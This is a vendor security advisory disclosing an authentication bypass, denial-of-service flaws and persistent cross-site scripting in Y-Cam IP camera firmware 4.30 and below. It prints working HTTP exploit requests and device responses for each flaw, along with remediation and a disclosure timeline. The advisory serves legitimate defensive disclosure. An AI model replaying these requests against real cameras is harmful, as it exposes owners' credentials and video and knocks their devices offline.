Trustwave SpiderLabs Security Advisory TWSL2014-007:
Multiple Vulnerabilities in Y-Cam IP Cameras

Published: 05/01/14
Version: 1.0

Vendor: Y-Cam (http://www.y-cam.com)
Products: Multiple Y-Cam camera models

SD range models – YCB003, YCK003, YCW003
S range models – YCB004, YCK004, YCW004
EyeBall - YCEB03
Bullet VGA models – YCBL03, YCBLB3
Bullet HD 720 – YCBLHD5
Y-cam Classic Range – YCB002, YCK002, YCW003
Y-cam Original Range – YCB001, YCW001

Version affected:  Firmware versions 4.30 and below 

Product description:
Y-Cam offers a variety of wireless/wired IP cameras that allow for 
streaming video/picture, motion detection, alert/alarm messaging, 
local or remote storage, DDNS, infrared viewing, and more depending 
on the model.

Finding 1: Administrative Authentication Bypass via Directory Traversal Vulnerability
Credit: David Aaron of Trustwave SpiderLabs
CVE: CVE-2014-1900
CWE: CWE-22

Affected Y-Cam models are vulnerable to an authentication bypass. This
bypass allows for the viewing of restricted pages on the device, including
pages which display cleartext information such as administrative
username(s) and password(s), internal IP addresses, MAC address of the
device, SSID names, encryption keys, recorded video, ftp server IP's, and
more.

REQUEST:
GET /./en/account/accedit.asp?item=0 HTTP/1.1

RESPONSE:
HTTP/1.0 200 OK
Date: Thu Nov  8 21:16:42 2012
Server: Webs
Pragma: no-cache
Cache-Control: no-cache
Content-type: text/html

<-- SNIP -->
<font color=#000000>Edit user</font>
<-- SNIP -->
<td width=40%>User name:</td>
<td width=60%>admin</td>
<-- SNIP -->
<td>Password:</td>
<td><input type=password name=PASSWD size=32 maxlength=22 value="1234"></td>
<-- SNIP -->

Finding 2: Denial of Service Vulnerability
Credit: David Aaron of Trustwave SpiderLabs
CVE: CVE-2014-1901
CWE: CWE-20

Affected Y-Cam IP cameras are also vulnerable to multiple Denial of Service (DoS) 
attacks. Crafted messages may be sent which will cause the target device 
to reboot.

1. Performing DoS on /en/store_main.asp

REQUEST:
GET /./en/store_main.asp?path=%22%3E%3Cscript%3Ealert(%27XSS%27);%3C/script%3E HTTP/1.1


RESPONSE:
null

2. Performing DoS on /en/account/accedit.asp

REQUEST (send twice):
GET /./en/account/accedit.asp?item=-100 HTTP/1.1

RESPONSE:
null


3. Performing DoS on /en/smtpclient.asp

GET /./en/smtpclient.asp?flag=0&emailid=%22%3E%3Cscript%3Ealert(%27XSS%27);%3C/script%3E HTTP/1.1

RESPONSE:
null


Finding 3: Persistent Cross-site Scripting Vulnerability
Credit: David Aaron of Trustwave SpiderLabs
CVE: CVE-2014-1902
CWE: CWE-79

Multiple persistent cross-site scripting (XSS) vulnerabilities were
discovered in the product. These attacks would require basic auth.

1. Performing XSS on /en/identity.asp

REQUEST:
POST /form/identityApply HTTP/1.1
Authorization: Basic YWRtaW46MTIzNA==
Content-Type: application/x-www-form-urlencoded
Content-Length: 156

SYSNAME=Room+Camera&SYSCONTACT=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3B%3C%2Fscript%3E&SYSLOCATION=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3B%3C%2Fscript%3E

REQUEST:
GET /en/identity.asp HTTP/1.1
Authorization: Basic YWRtaW46MTIzNA==

RESPONSE:
HTTP/1.0 200 OK
Date: Mon Nov 12 18:17:57 2012
Server: Webs
Pragma: no-cache
Cache-Control: no-cache
Content-type: text/html

<-- SNIP -->
<td>System Contact:</td>
<td><input type=text name=SYSCONTACT size=25 maxlength=50 value=""><script>alert('XSS');</script>"></td>
</tr>
<tr>
<td>System Location:</td>
<td><input type=text name=SYSLOCATION size=25 maxlength=50 value=""><script>alert('XSS');</script>"></td>
<-- SNIP -->

2. Performing XSS on /en/account/accedit.asp

REQUEST:
POST /form/accAdd HTTP/1.1
Authorization: Basic YWRtaW46MTIzNA==
Content-Type: application/x-www-form-urlencoded
Content-Length: 134

USER=user&PASSWD=%22%3E%3Cscript%3Ealert('XSS')%3B%3C%2Fscript%3E&RPASSWD=%22%3E%3Cscript%3Ealert('XSS')%3B%3C%2Fscript%3E&ADD=Add

REQUEST:
GET /en/account/accedit.asp?item=1 HTTP/1.1
Authorization: Basic YWRtaW46MTIzNA==

RESPONSE:
HTTP/1.0 200 OK
Date: Mon Nov 12 18:21:26 2012
Server: Webs
Pragma: no-cache
Cache-Control: no-cache
Content-type: text/html
<-- SNIP -->
<td>Password:</td>
<td><input type=password name=PASSWD size=32 maxlength=22 value=""><script>alert('XSS');</script>"></td>
</tr>
<tr>
<td>Re-type password:</td>
<td><input type=password name=RPASSWD size=32 maxlength=22 value=""><script>alert('XSS');</script>"></td>
<-- SNIP -->

3. Performing XSS on /en/clock.asp:
REQUEST:
POST /form/clockApply HTTP/1.1
Authorization: Basic YWRtaW46MTIzNA==
Content-Type: application/x-www-form-urlencoded
Content-Length: 199

Bcmd=18&UTCTime=1352746727.689&DLS=0&currSysTime=undefined+07%3A58%3A42&sysTime=undefined+07%3A58%3A46&DayLight=off&timeZone=-660&NTPSERVER=%22%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3B%3C%2Fscript%3E

REQUEST:
GET /en/clock.asp HTTP/1.1
Authorization: Basic YWRtaW46MTIzNA==

RESPONSE:
HTTP/1.0 200 OK
Date: Mon Nov 12 18:56:38 2012
Server: Webs
Pragma: no-cache
Cache-Control: no-cache
Content-type: text/html

<-- SNIP -->
<td>Time server</td>
<td colspan=2><input type=text name=NTPSERVER size=31 maxlength=63 value=""><script>alert('XSS');</script> ></td>
<-- SNIP -->

4. Performing XSS on /en/smtpclient.asp:
REQUEST:
POST /form/smtpclientApply HTTP/1.1
Authorization: Basic YWRtaW46MTIzNA==
Content-Type: application/x-www-form-urlencoded
Content-Length: 549

FLAG=0&EMAILIDBAK=0&EMAILID=0&SERVER=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3B%3C%2Fscript%3E&PORT=25&TLS=no&AUTH=yes&USER=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3B%3C%2Fscript%3E&PASSWD=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3B%3C%2Fscript%3E&REPASSWD=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3B%3C%2Fscript%3E&SENDER=fakeemail%40trustwave.com&RECEIVER1=fakeemails%40trustwave.com&RECEIVER2=&RECEIVER3=&SUBJECT=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3B%3C%2Fscript%3E&MAILBODY=%3C%2Ftextarea%3E%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3B%3C%2Fscript%3E

REQUEST:
GET /en/smtpclient.asp HTTP/1.1
Authorization: Basic YWRtaW46MTIzNA==

RESPONSE:
HTTP/1.0 200 OK
Date: Mon Nov 12 19:34:37 2012
Server: Webs
Pragma: no-cache
Cache-Control: no-cache
Content-type: text/html

<td>SMTP server name:</td>
<td><input type=text name=SERVER size=32 maxlength=64 value=""><script>alert('XSS');</script>"></td>
<-- SNIP -->
<td>User name:</td>
<td><input type=text name=USER size=32 maxlength=64 value=""><script>alert('XSS');</script>"></td>
</tr>
<tr>
<td>Password:</td>
<td><input type=password name=PASSWD size=32 maxlength=128 value=""><script>alert('XSS');</script>"></td>
</tr>
<tr>
<td>Re-type password:</td>
<td><input type=password name=REPASSWD size=32 maxlength=128 value=""><script>alert('XSS');</script>"></td>
<-- SNIP -->
<td>Subject:</td>
<td><input type=text name=SUBJECT size=32 maxlength=128 value=""><script>alert('XSS');</script>"></td>
</tr>
<tr>
<td>Message:</td>
<td><textarea rows=2 name=MAILBODY cols=26></textarea>"><script>alert('XSS');</script></textarea></td>
<-- SNIP -->

Performing XSS on /en/ftp.asp:
REQUEST:
POST /form/ftpApply HTTP/1.1
Authorization: Basic YWRtaW46MTIzNA==
Content-Type: application/x-www-form-urlencoded
Content-Length: 330

FLAG=0&FTPIDBAK=0&FTPID=0&SERVER=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3B%3C%2Fscript%3E&PORT=21&ANONYMOUS=no&USER=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3B%3C%2Fscript%3E&PASSWD=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3B%3C%2Fscript%3E&REPASSWD=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3B%3C%2Fscript%3E&PASSIVEMODE=on&TIMEOUT=3600

REQUEST:
GET /en/ftp.asp HTTP/1.1
Authorization: Basic YWRtaW46MTIzNA==

RESPONSE:
HTTP/1.0 200 OK
Date: Mon Nov 12 19:29:48 2012
Server: Webs
Pragma: no-cache
Cache-Control: no-cache
Content-type: text/html

<-- SNIP -->
<td>FTP server name:</td>
<td><input type=text name=SERVER size=32 maxlength=64 value=""><script>alert('XSS');</script>"></td>
<-- SNIP -->
<td>User name:</td>
<td><input type=text name=USER size=32 maxlength=64 value=""><script>alert('XSS');</script>"></td>
</tr>
<tr>
<td>Password:</td>
<td><input type=password name=PASSWD size=32 maxlength=128 value=""><script>alert('XSS');</script>"></td>
</tr>
<tr>
<td>Re-type password:</td>
<td><input type=password name=REPASSWD size=32 maxlength=128 value=""><script>alert('XSS');</script>"></td>
<-- SNIP -->


6. Performing XSS on /en/httpevent.asp
REQUEST:
POST /form/httpEventApply HTTP/1.1
Authorization: Basic YWRtaW46MTIzNA==
Content-Type: application/x-www-form-urlencoded
Content-Length: 299

FLAG=0&HTTPIDBAK=0&HTTPID=0&SERVER=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3B%3C%2Fscript%3E&PORT=80&AUTH=no&USER=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3B%3C%2Fscript%3E&PASSWD=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3B%3C%2Fscript%3E&REPASSWD=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3B%3C%2Fscript%3E

REQUEST:
GET /en/httpevent.asp HTTP/1.1
Authorization: Basic YWRtaW46MTIzNA==

RESPONSE:
HTTP/1.0 200 OK
Date: Mon Nov 12 19:20:49 2012
Server: Webs
Pragma: no-cache
Cache-Control: no-cache
Content-type: text/html

<-- SNIP -->
<td>HTTP server name:</td>
<td><input type=text name=SERVER size=32 maxlength=64 value=""><script>alert('XSS');</script>"></td>
<-- SNIP -->
<td>User name:</td>
<td><input type=text name=USER size=32 maxlength=64 value=""><script>alert('XSS');</script>"></td>
</tr>
<tr>
<td>Password:</td>
<td><input type=password name=PASSWD size=32 maxlength=128 value=""><script>alert('XSS');</script>"></td>
</tr>
<tr>
<td>Re-type password:</td>
<td><input type=password name=REPASSWD size=32 maxlength=128 value=""><script>alert('XSS');</script>"></td>
</tr>
<-- SNIP -->

Remediation Steps:
Upgrade to firmware 4.51 if the affect model is running firmware version
4.30 or the cameras serial number is YCAM/YCAS/YCMN/YCSN12xxxxxxxxxx or
higher.  Affected models below firmware version 4.23 should upgrade to
firmware 4.50. However, Trustwave SpiderLabs have not verified this fix.

Revision History:
12/07/12 - Vulnerability disclosed
04/30/14 - Patch released by vendor
05/01/14 - Advisory published

References
1. http://www.y-cam.com/y-cam-security-fix/


About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world. For
organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive
solutions that include its flagship TrustKeeper compliance management
software and other proprietary security solutions. Trustwave has helped
thousands of organizations--ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized retailers--manage
compliance and secure their network infrastructure, data communications and
critical information assets. Trustwave is headquartered in Chicago with
offices throughout North America, South America, Europe, Africa, China and
Australia. For more information, visit https://www.trustwave.com

About Trustwave's SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penetration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetration tests and hundreds of
application security tests globally. In addition, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs

Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.